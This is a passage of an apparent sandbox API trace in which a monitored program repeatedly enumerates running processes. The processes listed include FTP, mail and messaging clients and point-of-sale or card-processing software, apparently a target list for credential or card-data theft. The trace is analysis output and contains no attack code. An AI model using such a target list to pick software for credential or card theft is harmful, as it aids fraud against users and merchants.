lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0269.525] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0269.527] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0269.532] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.533] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0269.534] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0269.536] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0269.537] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0269.539] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.540] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0269.541] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0269.601] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0269.606] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0269.608] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0269.609] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0269.611] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0269.612] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0269.614] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0269.616] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0269.617] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0269.619] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0269.620] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0269.625] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0269.627] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0269.628] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0269.630] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0269.631] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0269.633] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0269.634] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0269.636] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0269.638] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0269.642] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0269.644] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0269.645] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0269.647] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0269.648] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0269.650] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0269.651] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0269.691] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0269.694] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0269.697] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0269.699] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0269.702] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0269.705] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0269.707] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0269.710] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0269.712] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0269.717] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0269.719] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0269.722] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0269.724] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0269.727] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0269.729] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0269.798] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0269.800] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0269.803] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0269.805] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0269.807] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0269.810] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0269.812] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0269.814] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0269.816] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0269.819] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0269.821] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0269.823] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0269.827] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0269.829] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0269.831] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0269.833] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0269.835] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0269.837] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0269.839] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0269.906] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0269.908] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0269.909] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0269.911] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0269.913] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0269.915] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0269.916] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0269.919] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0269.920] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0269.922] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0269.924] CloseHandle (hObject=0x9e0) returned 1 [0269.924] Sleep (dwMilliseconds=0x64) [0270.078] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0270.088] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: 